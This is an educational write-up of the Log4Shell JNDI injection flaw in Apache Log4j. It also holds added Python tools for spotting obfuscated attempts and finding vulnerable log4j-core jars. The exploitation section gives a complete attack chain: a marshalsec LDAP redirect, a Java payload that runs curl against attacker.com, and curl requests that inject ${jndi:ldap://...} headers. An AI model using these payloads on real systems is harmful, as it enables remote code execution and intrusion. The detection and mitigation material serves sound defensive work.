⚠️ Disclaimer: This article is for educational purposes only. Only test on systems you have explicit authorization to test.
Overview
Vulnerability Type: Remote Code Execution (RCE) via JNDI Injection
Impact: Critical (CVSS 10.0)
Affected Systems: Apache Log4j 2.0-beta9 to 2.14.1
How the Vulnerability Works
Understanding JNDI
JNDI (Java Naming and Directory Interface) is a Java API for connecting to directory services like LDAP.
The problem: Log4j's message lookup feature evaluated ${...} expressions found anywhere in a logged message, including attacker-controlled input such as HTTP headers, and a JNDI lookup made it fetch resources from a remote server:
User-Agent: ${jndi:ldap://attacker.com/exploit}
When Log4j logged this value, it would:
- See the ${jndi:...} lookup in the message
- Connect to the attacker's LDAP server
- Download and execute a malicious Java class!
Exploitation (Lab Environment Only)
Set Up Vulnerable Lab
docker pull ghcr.io/christophetd/log4shell-vulnerable-app
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
LDAP Redirect Server
java -cp marshalsec-all.jar \
marshalsec.jndi.LDAPRefServer "http://attacker-ip:8888/#Exploit"
Malicious Java Payload
public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("curl attacker.com/callback");
        } catch (Exception e) { e.printStackTrace(); }
    }
}
javac Exploit.java
python3 -m http.server 8888
Trigger the Exploit
curl -H 'X-Api-Version: ${jndi:ldap://attacker.com:1389/exploit}' \
http://target:8080/
curl -A '${jndi:ldap://attacker.com:1389/exploit}' http://target:8080/
Detection
# Search logs for exploitation attempts
grep -E '\$\{jndi:(ldap|rmi|dns|corba)://' /var/log/app/*.log
# Broader regex
grep -iE '\$\{[^\}]*j[^\}]*n[^\}]*d[^\}]*i[^\}]*:' /var/log/*.log
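The broader grep above tolerates characters between the letters of "jndi", but it still leaves the analyst reading obfuscated text. The following added example (not from the article) goes one step further: it folds the nested lookup forms attackers used to hide the payload (${lower:x}, ${upper:x} and the ${...:-x} default-value trick) back into plain text, and then matches the decoded string. The access-log lines and the 203.0.113.x addresses are constructed for this demonstration; the scheme list adds ldaps and iiop to the four schemes in the article's grep.

```python
import re

# Added example (not from the article): normalize the lookup obfuscations that
# attackers used to hide the literal string "jndi", then match the decoded text.
# All sample log lines below are constructed for this demonstration.

# ${lower:x} / ${upper:x} wrappers resolve to x (case is ignored when matching later)
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-x} resolves to the default value x when the lookup is undefined,
# which covers ${::-x} and ${env:NOPE:-x} style fragments
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# JNDI schemes seen in exploitation attempts; ldap/rmi/dns/corba are in the
# article's grep, ldaps and iiop are added here
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba)\s*:", re.IGNORECASE
)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups innermost-first until the text stops changing."""
    for _ in range(max_rounds):
        folded = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        folded = _DEFAULT_VALUE.sub(lambda m: m.group(1), folded)
        if folded == text:
            break
        text = folded
    return text


def is_jndi_attempt(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        decoded = normalize(line)
        if JNDI_LOOKUP.search(decoded):
            hits.append((number, decoded))
    return hits


# Constructed access-log excerpt: plain, case-mangled, ${lower:} and
# default-value obfuscated payloads plus two benign lines.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${JnDi:LdAp://203.0.113.9:1389/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.9:1389/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:rmi://203.0.113.9:1099/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${java:version}"',
]

if __name__ == "__main__":
    for number, decoded in scan(SAMPLE_LOG):
        print(f"line {number}: {decoded}")
```

Running the script lists lines 2 to 6 with the payload decoded to its plain ${jndi:ldap://...} or ${jndi:rmi://...} form, while the ordinary User-Agent and the benign ${java:version} lookup are not reported. Alerting on the normalized string rather than the raw line also makes it easy to group attempts by destination host when triaging.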
Mitigation
# Immediate — disable JNDI lookups (the log4j2.formatMsgNoLookups property is honored by Log4j 2.10 and later)
java -Dlog4j2.formatMsgNoLookups=true -jar application.jar
<!-- Permanent — update Log4j dependency -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.17.1</version>
</dependency>
Key Takeaways
- Never trust external input in logging contexts
- JNDI is dangerous in environments accepting user input
- Maintain an asset inventory to know where Log4j is deployed
- Virtual Patching (WAF rules) is critical for rapid response
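Updating the log4j-core dependency only helps where you know it is deployed, and the asset-inventory takeaway above is the hard part in practice: log4j-core is often bundled inside WAR and EAR files rather than listed in a build file. The following added example (not from the article) walks a directory tree, opens every JAR/WAR/EAR archive and the archives nested inside them, and reports whether the JndiLookup class is present and which version the Maven pom.properties metadata declares. Its status values follow the article's numbers: "vulnerable" for 2.0-beta9 through 2.14.1, "outdated" for anything below the 2.17.1 the article updates to, and "no-jndi-lookup" for a jar from which the JndiLookup class has been stripped. The sample archives it scans are constructed in a temporary directory and contain metadata only, no real bytecode.

```python
import io
import os
import re
import tempfile
import zipfile

# Added example (not from the article): locate log4j-core inside JAR/WAR/EAR
# archives, including archives nested in other archives, and report whether the
# JndiLookup class is present and which version the Maven metadata claims.
# The sample archives are constructed in a temporary directory (no bytecode).

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def version_tuple(version: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0) (pre-release tag dropped)."""
    core = version.split("-", 1)[0]
    parts = [int(p) for p in re.findall(r"\d+", core)]
    parts += [0] * (3 - len(parts))
    return tuple(parts[:3])


def classify(has_jndi_lookup: bool, version):
    """Map what was found in an archive to a status; None means 'not log4j-core'."""
    if not has_jndi_lookup and version is None:
        return None
    if not has_jndi_lookup:
        return "no-jndi-lookup"        # class removed: the lookup cannot fire
    if version is None:
        return "unknown-version"       # e.g. shaded jar without Maven metadata
    v = version_tuple(version)
    if v <= (2, 14, 1):
        return "vulnerable"            # inside the article's affected range
    if v < (2, 17, 1):
        return "outdated"              # below the version the article updates to
    return "ok"


def inspect_archive(zf: zipfile.ZipFile, label: str):
    """Yield (label, status, version) for zf and every archive nested in it."""
    names = set(zf.namelist())
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    status = classify(JNDI_LOOKUP_CLASS in names, version)
    if status is not None:
        yield (label, status, version)
    for name in sorted(names):
        if not name.lower().endswith(ARCHIVE_SUFFIXES):
            continue
        try:
            with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                yield from inspect_archive(inner, f"{label}!{name}")
        except zipfile.BadZipFile:
            continue


def scan_directory(root: str):
    """Walk root and collect findings from every archive found."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if not fn.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(path) as zf:
                    findings.extend(inspect_archive(zf, path))
            except zipfile.BadZipFile:
                continue
    return findings


def summarize(findings, root: str) -> dict:
    """Key findings by path relative to root ('outer.war!inner/path.jar' when nested)."""
    out = {}
    for label, status, _version in findings:
        head, sep, tail = label.partition("!")
        out[os.path.relpath(head, root) + sep + tail] = status
    return out


def fake_log4j_core(version: str, with_jndi: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core jar (metadata only, no bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"placeholder")
    return buf.getvalue()


def build_sample_tree() -> str:
    """Constructed sample: a vulnerable jar, a patched jar, and a war whose
    embedded jar had JndiLookup.class stripped out. Caller removes the directory."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(fake_log4j_core("2.14.1"))
    with open(os.path.join(root, "log4j-core-2.17.1.jar"), "wb") as f:
        f.write(fake_log4j_core("2.17.1"))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar",
                    fake_log4j_core("2.14.1", with_jndi=False))
    with open(os.path.join(root, "app.war"), "wb") as f:
        f.write(war.getvalue())
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for label, status in summarize(scan_directory(root), root).items():
        print(f"{status:16} {label}")
```

Point scan_directory at an application server's deployment root to get the same three-way answer for real archives. A jar reported as "no-jndi-lookup" at an old version is one where the class-removal workaround was applied; it still deserves the dependency update, but it is not where the lookup can fire. "unknown-version" usually means a shaded or repackaged jar, which is exactly the kind of copy a build-file search misses.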